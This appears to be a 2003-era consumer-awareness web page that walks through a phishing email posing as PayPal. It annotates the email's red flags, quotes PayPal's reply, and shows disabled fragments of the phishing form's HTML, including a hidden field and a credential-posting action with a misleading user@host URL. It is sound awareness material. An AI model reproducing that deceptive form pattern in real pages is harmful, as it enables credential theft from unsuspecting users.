Useful information, interesting links, and much more.
You are visiting  
Please choose a

Use the menu to view your

Choose an article with these menus. To return to your last choices use your browser's BACK button.
Special Links
American Patriotism
Short Cut Menu
God Bless America
 
Home Page

Click Picks
Internet & Security
Loading

   • Enter search text below.
   • Press the "Search" button.
   • Click "X" to return here.

5. The PayPal Spam Scam
Spammers prey on your trust of companies with a good reputation. Check out this scam.
Next Page
See also

In May of 2003 we received a letter from PayPal requesting that we verify our account to ensure our service could continue. On the surface this seems like a reasonable request. Please read our comments to the right of the letter. Some of the problems with this letter are obvious but some are very subtle.

We have received several additional mailings since this page was produced. Each of these had different opt-out messages but otherwise they were almost identical. It took several months for the media to pick up on this:

  • This scam finally became so pervasive that PC Magazine headlined it in their July 2003 edition, Vol 22 No. 12.
  • In December 2003 we heard a radio program mention this scam, including similar letters from eBay.

In December, 2003 we received another note supposedly from PayPal. Apparently someone is reading the Web and magazine articles and listening to the radio because they have addressed many of our concerns in their latest scam. Click here to read that story.

The letter has been re-created to look approximately as we received it, complete with the PayPal logo. This process took only a few minutes using features available to every Windows user. Please remember this the next time you receive an unexpected official-looking letter! Note that the links and the form submission feature have been disabled in this simulation.

From Paysecurity <paysecurity@paypal.com> This looks like an official letter from PayPal, although we have no way of knowing if "PaySecurity" is a valid mailbox.
Date Saturday, May 24, 2003 5:26 PM
To < our e-mail address >
Subject Dear PayPal Customer

It took us only five minutes to re-create the look of this letter using PayPal's logo and the blue graphic. The Verdana font, and the shaded gray text at the bottom, further imitate PayPal's look.

It costs little, if anything, to maintain a dormant account. Dropping an inactive user means the potential loss of revenue.

No reputable financial institution will ask you to verify your private information in this manner.

There are several major problems with this form:
1. PayPal uses your e-mail account as your user ID.
2. Never give out your password to anyone, ever! Your user ID and password allow full access to your account.
3.

PayPal should have your credit card information on file. This information will allow someone to make on-line purchases.

4. Your PIN is being requested. Banks will never ask you for this number.
5. Clicking "Log In" will send your private information via an unsecured server.
   
The expiration date lends a sense of urgency to the request.

This notification was indeed "sent to our mailbox", however, this is not the mailbox PayPal has on record.

This is supposed to be an urgent letter to PayPal's clients, not a "newsletter or product update".



This is supposed to be a business letter to PayPal's clients. If so, why does it include an "opt out" from receiving product offerings and solicitations from Providian National Bank?


Why is this letter copyright? Why is the date 2002 when it was sent in May 2003?


This letter is asking us to send private information through an unsecured site. Mail servers and standard HTTP:// Websites are not secure for financial transactions. Secure sites have a name starting with HTTPS:// (note the S). This information is being sent in the clear and therefore subject to being captured and misused.

So, how could a reputable company like PayPal make so many foolish blunders? Our guess is that they didn't. We wrote to PayPal about this letter and received the reply reproduced below. Our suspicion that this is a scam were confirmed by the second paragraph.

 

Thank you for bringing this incident of suspicious activity to our attention. PayPal will investigate this activity immediately and contact you further if any additional information is required. We appreciate your concern and Thank you for making PayPal the most trusted online payment service.

PayPal and its representatives will NEVER ask you to reveal your password. There are NO EXCEPTIONS to this policy. If anyone claiming to work for PayPal asks for your password under any circumstances, by email or by phone, please refuse and immediately contact us via webform at https://www.paypal.com/wf/f=sa_pass.

 

The purpose of this letter becomes more apparent if you analyze the code for the form used in the letter. When you click the "Log In" button at the bottom of the form you will send the name and value for each of the six fields in the form. The important parts of two fields are shown below in bold text. Note that the ID field is a seventh "hidden" field that you will not see but it will be sent nonetheless.

<input name="full_name" type="text" size="30" maxlength="32">
<input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">

When you click on the "Log In" button you will send the form with the six fields you entered, plus the hidden field, to the address listed in "form action" below; it has been altered on this page so it will not function. Your private information will be going to this unsecured site, where a script on the page will do something with it. The follow-up note we received from PayPal explains what is probably happening.

<form action="http://www paypal com@ superspeed port5 com/000 php" method="get">

PayPal's referral program is meant to encourage people to introduce the benefits of PayPal to their friends and family, and to people they transact with online. It is not intended to encourage spam. We apologize for this inconvenience and appreciate your report.

 

PayPal has a program whereby they will pay you $5 to refer a friend or associate who uses their service. It appears that for each response to this e-mail someone stands to pocket $5. Perhaps having someone steal $5 from PayPal is not important to you. Perhaps having someone have access to your credit card information, including its PIN, is!

Is this spam a scam? Our guess is that it is.

Beware of similar scams "from" other reputable companies, such as eBay, that ask for personal identification or that try to install software.

For example, one letter "from" Microsoft offers to update the security of your computer to the latest level. If you open the attached file you will send the letter to people on your mailing list, not to mention fouling up your computer. Microsoft (and most companies) will never send out patches. They may send you a link to their update page but they will never send you files.


Next Page
See also


rev 01/27/13
> 03/19/06

   
www.Eagle-Wing.Net